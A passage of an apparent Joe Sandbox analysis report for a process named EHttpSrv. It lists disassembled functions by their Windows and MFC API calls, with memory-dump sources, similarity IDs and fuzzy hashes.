                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578#587$#745#753#764Destroy$#6003#605#651#658#722#741AcceleratorCursorTablefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 2068799961-0
                                                                                                                • Opcode ID: 666a700826f119f38579f7ef2fcd8c9e43e6422b478b081f34851a4a66f0cb02
                                                                                                                • Instruction ID: 8433f1e96585c3a77f89288825cb40f808eff763fc34447904563ac6f3275bab
                                                                                                                • Opcode Fuzzy Hash: 666a700826f119f38579f7ef2fcd8c9e43e6422b478b081f34851a4a66f0cb02
                                                                                                                • Instruction Fuzzy Hash: 20212930008B818AD315DF74C895B9BBFE0AB75748F508D5CE0DA876A2DB78664CCBD2
                                                                                                                APIs
                                                                                                                • GetClientRect.USER32(?,?), ref: 2042FF4F
                                                                                                                • PtInRect.USER32(?,?,?), ref: 2042FF7D
                                                                                                                • GetWindowRect.USER32(?,?), ref: 2042FF90
                                                                                                                • GetParent.USER32(?), ref: 2042FF9A
                                                                                                                • #2366.MFC80U(00000000), ref: 2042FFA1
                                                                                                                • #6140.MFC80U(00000000,?,?,?,00000000,00000000), ref: 2042FFBB
                                                                                                                • #5829.MFC80U(00000000,?,?,?,00000000,00000000), ref: 2042FFC9
                                                                                                                • #1894.MFC80U ref: 2042FFD7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$#1894#2366#5829#6140ClientParentWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 212747824-0
                                                                                                                • Opcode ID: 6937a4f93c5ea9244e49995fcdc09199884f663bc647000cf4e6ccc2ac0629fa
                                                                                                                • Instruction ID: 2bf1152b81ae0c4fa8cd025b0b9b50b58acb653149e68ad9b126918eb8fed9ab
                                                                                                                • Opcode Fuzzy Hash: 6937a4f93c5ea9244e49995fcdc09199884f663bc647000cf4e6ccc2ac0629fa
                                                                                                                • Instruction Fuzzy Hash: 031130712147059FC314DF64CC85FABB7E8FB84619F008A1DF59686690DB78E844CB91
                                                                                                                APIs
                                                                                                                • #310.MFC80U(?,FEEA6C22,?,6FB1281E,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9D1
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9DF
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9ED
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044D9FD
                                                                                                                • #310.MFC80U(?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA0D
                                                                                                                • #4026.MFC80U(0000027C,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA1F
                                                                                                                • #4026.MFC80U(0000027D,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA2C
                                                                                                                • #4026.MFC80U(0000027E,?,?,00000000,2047E174,000000FF,20441127,00000000), ref: 2044DA39
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#4026
                                                                                                                • String ID:
                                                                                                                • API String ID: 3538715513-0
                                                                                                                • Opcode ID: 9beabf18ad02b9e4f8aeca6623d471602ee941e52d0de1d67d13c8cec5c15a8b
                                                                                                                • Instruction ID: ae243086d011bdde0d300e658b7e24c8606357b06fdfa419f5f8277fe1726ebc
                                                                                                                • Opcode Fuzzy Hash: 9beabf18ad02b9e4f8aeca6623d471602ee941e52d0de1d67d13c8cec5c15a8b
                                                                                                                • Instruction Fuzzy Hash: 4A216375208B409FC310DF15CC8875ABBE5EB85719F008A2DF85283790DB79950DCF52
                                                                                                                APIs
                                                                                                                  • Part of subcall function 2042F8C0: #1946.MFC80U(FEEA6C22,?,?,?,2047AF4A,000000FF,2042756F,?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042F90A
                                                                                                                  • Part of subcall function 2042F8C0: #578.MFC80U(FEEA6C22,?,?,?,2047AF4A,000000FF,2042756F,?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042F917
                                                                                                                  • Part of subcall function 2042F8C0: #587.MFC80U(?,?,2047B269,000000FF,204268BF,?), ref: 2042F927
                                                                                                                • #657.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042757A
                                                                                                                • #657.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042758A
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 2042759A
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275AA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275BA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275CA
                                                                                                                • #587.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275DA
                                                                                                                • #718.MFC80U(?,FEEA6C22,?,?,2047B269,000000FF,204268BF,?), ref: 204275E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #587$#657$#1946#578#718
                                                                                                                • String ID:
                                                                                                                • API String ID: 4135078562-0
                                                                                                                • Opcode ID: c9782c9832fcb8682713ef34a66ba18d4b6aa73f104265ab85aa5047acdd4a07
                                                                                                                • Instruction ID: d92657625d66678ccc7935c96932225f3c66df0d070de15a78006974df052bd7
                                                                                                                • Opcode Fuzzy Hash: c9782c9832fcb8682713ef34a66ba18d4b6aa73f104265ab85aa5047acdd4a07
                                                                                                                • Instruction Fuzzy Hash: 15114F30008B818BD315DF64C8557EABBE5BF60718F40CE5DE0A6476A1DB78A60CC792
                                                                                                                APIs
                                                                                                                • DestroyCursor.USER32(?), ref: 2042AADE
                                                                                                                • #578.MFC80U(FEEA6C22,?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AAEF
                                                                                                                • #741.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB00
                                                                                                                • #657.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB10
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB20
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB30
                                                                                                                • #587.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB40
                                                                                                                • #718.MFC80U(?,00000000,20479EBD,000000FF,204268D0,?,?), ref: 2042AB4F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #587$#578#657#718#741CursorDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1809897021-0
                                                                                                                • Opcode ID: 35b0d8bbf7a53fa6ecf621a24b0649546298cb5f07307ed5c26dcae269261dd7
                                                                                                                • Instruction ID: 977527ab95c424e6832e6ed6def81d3820f7ebedd5a3b3135f79d51513055072
                                                                                                                • Opcode Fuzzy Hash: 35b0d8bbf7a53fa6ecf621a24b0649546298cb5f07307ed5c26dcae269261dd7
                                                                                                                • Instruction Fuzzy Hash: E8115E70008B818FD311DF64C855B9ABBE4BF64714F00CE1DE4A6836A1DB78A608C792
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • wcsncmp.MSVCR80 ref: 2042EC1B
                                                                                                                • wcsncmp.MSVCR80 ref: 2042EC48
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsncmp$wcscpy_s
                                                                                                                • String ID: HKCU\$HKLM\$xXH $xXH
                                                                                                                • API String ID: 2575004286-3847691091
                                                                                                                • Opcode ID: 583dbd2c518f6b03a74561c9ecb2ed86324533ed251ee6c2f02ec5990ab2e6b3
                                                                                                                • Instruction ID: 5fbb683c4cbcbcf1aaa3ba0d5211c586f8c64f9d3f08b135c86883a917ea21da
                                                                                                                • Opcode Fuzzy Hash: 583dbd2c518f6b03a74561c9ecb2ed86324533ed251ee6c2f02ec5990ab2e6b3
                                                                                                                • Instruction Fuzzy Hash: 0DE1DE71A006489FDF14CF96E980BEA77B1BF19208F15C1A8ED056B386E738DE45CB60
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20448B88
                                                                                                                • SendMessageW.USER32(00000000), ref: 20448BCB
                                                                                                                • #310.MFC80U ref: 20448C16
                                                                                                                • #4026.MFC80U(0000022D), ref: 20448C2A
                                                                                                                • #578.MFC80U ref: 20448C42
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20448C7B
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20448F2C
                                                                                                                  • Part of subcall function 2042D000: IsWindow.USER32(?), ref: 2042D037
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#310#314#4026#578MessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613437865-0
                                                                                                                • Opcode ID: dbbf1c2679c8c57563a73d693fbeded845e95855667f570ce51ce7c4e9b716bd
                                                                                                                • Instruction ID: aef0371a62a55a85432a202e164e070c81619bdb81af31f70ff8ae9106dbb37a
                                                                                                                • Opcode Fuzzy Hash: dbbf1c2679c8c57563a73d693fbeded845e95855667f570ce51ce7c4e9b716bd
                                                                                                                • Instruction Fuzzy Hash: A0B1AB71A097809FE304CFA4C981B5EBBE1FB94714F108A2DF5418B7A0CB79E901DB92
                                                                                                                APIs
                                                                                                                • malloc.MSVCR80 ref: 2040C597
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 2040C5BB
                                                                                                                • malloc.MSVCR80 ref: 2040C5E7
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 2040C612
                                                                                                                • malloc.MSVCR80 ref: 2040C708
                                                                                                                • free.MSVCR80 ref: 2040C759
                                                                                                                • free.MSVCR80 ref: 2040C767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc$ByteCharMultiWidefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 707110232-0
                                                                                                                • Opcode ID: bc2ad66ffb2963f783f2243d38d8883cee7a9bd424fa96275830423f5b417432
                                                                                                                • Instruction ID: f75eb00dc676f980c803eb227b2ca50fa95ea541d82a1da571b469d9a962dd34
                                                                                                                • Opcode Fuzzy Hash: bc2ad66ffb2963f783f2243d38d8883cee7a9bd424fa96275830423f5b417432
                                                                                                                • Instruction Fuzzy Hash: C4614C756043029FC314CF68C884B17BBE5AF88754F14C96DE989A7391E774EA08CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044CA82
                                                                                                                • #310.MFC80U ref: 2044CAED
                                                                                                                • #5149.MFC80U(000001F4,000001F4), ref: 2044CB18
                                                                                                                • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000), ref: 2044CB29
                                                                                                                • #5398.MFC80U(000000FF), ref: 2044CBEB
                                                                                                                • #578.MFC80U ref: 2044CBFD
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044CC98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#314#5149#5398#578#6751CertNameString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2456080415-0
                                                                                                                • Opcode ID: 359466542936a10d833dcea9c59399fb0e95c224dc76e324f40d3d4a4dd1047f
                                                                                                                • Instruction ID: fa41959962371d0794451eda7c1d9808ee06ed86ef66dff3c495645590ad59e6
                                                                                                                • Opcode Fuzzy Hash: 359466542936a10d833dcea9c59399fb0e95c224dc76e324f40d3d4a4dd1047f
                                                                                                                • Instruction Fuzzy Hash: 9E617F716087019BD710CFA4C885B5AB7E5FB98718F24C62CF568973E1CB38E945CBA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176#280#578#774
                                                                                                                • String ID:
                                                                                                                • API String ID: 2589826963-0
                                                                                                                • Opcode ID: 3aee841dd4767aa561259c6d97ef28f9627ad1a095f4b03319da11ed7311dfe6
                                                                                                                • Instruction ID: b412220d2f80d9e6b8f98ad02a641db55c70cde94908a098124107b1af562d9d
                                                                                                                • Opcode Fuzzy Hash: 3aee841dd4767aa561259c6d97ef28f9627ad1a095f4b03319da11ed7311dfe6
                                                                                                                • Instruction Fuzzy Hash: AA414B716087059FC314CF59C885A5AF7E5FB88729F108A2EF89687790DB39E904CF91
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,20485878,00000000,?,00000000,?,00000000,00000008,-00000023,6FAD4B78,?), ref: 2043D287
                                                                                                                • wcscpy_s.MSVCR80 ref: 2043D2C1
                                                                                                                • wcsrchr.MSVCR80 ref: 2043D2F6
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2043D325
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,20485878,00000000,?,00000000,?,00000000), ref: 2043D33C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$CloseOpenwcscpy_swcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2152705125-0
                                                                                                                • Opcode ID: 58d862d149c1be47d7913818b6ab24ce32d2019250fc2f80153d569dc36f2dc7
                                                                                                                • Instruction ID: 73e8dee97a2906a9ac4023fad5512ce7367ed15ae19a3f53bcb8052f95a96eae
                                                                                                                • Opcode Fuzzy Hash: 58d862d149c1be47d7913818b6ab24ce32d2019250fc2f80153d569dc36f2dc7
                                                                                                                • Instruction Fuzzy Hash: F731D4712443007BD320DB95EC89F9777ADEF89B05F20881CFA0597185EA7CE504CB62
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy_s
                                                                                                                • String ID: pVJ $pVJ
                                                                                                                • API String ID: 1502251526-1686371878
                                                                                                                • Opcode ID: b0fd80f6f29a2b4531f7504de39165ae335b15b96e92ffbd8b537b3fe6b44163
                                                                                                                • Instruction ID: 035c3c3053ea15f29b462dcaff85bb51d9f3f8aa72db6a330897e3da57f46125
                                                                                                                • Opcode Fuzzy Hash: b0fd80f6f29a2b4531f7504de39165ae335b15b96e92ffbd8b537b3fe6b44163
                                                                                                                • Instruction Fuzzy Hash: 6D313EB15083049FC750CF65C981B5BBBE4BB98714F40886EFA4DAB280E77999048B66
                                                                                                                APIs
                                                                                                                • #354.MFC80U(000000A7,?,FEEA6C22,?,?,00000000,00000000,204800D3,000000FF,204709B7,00000000,?,?,?,?), ref: 20469463
                                                                                                                • #416.MFC80U(000000A7,?,FEEA6C22,?,?,00000000,00000000,204800D3,000000FF,204709B7,00000000,?,?,?,?), ref: 2046947A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #310.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000A7), ref: 204694D4
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                • #563.MFC80U(?), ref: 2046951D
                                                                                                                  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
                                                                                                                  • Part of subcall function 20436CC0: #572.MFC80U(FEEA6C22,00000000,?,?,?,?,2047FB9B,000000FF,2046954E,?,?,?), ref: 20436CEA
                                                                                                                  • Part of subcall function 20436CC0: #310.MFC80U(FEEA6C22,00000000,?,?,?,?,2047FB9B,000000FF,2046954E,?,?,?), ref: 20436CFE
                                                                                                                  • Part of subcall function 20436CC0: memset.MSVCR80 ref: 20436DBB
                                                                                                                • #776.MFC80U(20485878,?,?,?), ref: 20469574
                                                                                                                • #1079.MFC80U ref: 2046957D
                                                                                                                • LoadAcceleratorsW.USER32(?,0000008A), ref: 2046958B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#557#572Load$#1079#354#416#530#563#6003#776AcceleratorsCursorEmptyRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1543791554-0
                                                                                                                • Opcode ID: cddfcd618fcc776f6786d7afcf94eb45054a47f4e56a1e55c903af9242f48df2
                                                                                                                • Instruction ID: a46ccbdb704f9dd8e5b3b3a8ee9067b3fdc2097a17fb0de770ace96f8e92f55f
                                                                                                                • Opcode Fuzzy Hash: cddfcd618fcc776f6786d7afcf94eb45054a47f4e56a1e55c903af9242f48df2
                                                                                                                • Instruction Fuzzy Hash: 1B412EB0508B818ED311DF74C48579BFFE5AFA5608F108D1DF4DA87251DB79A108CB92
                                                                                                                APIs
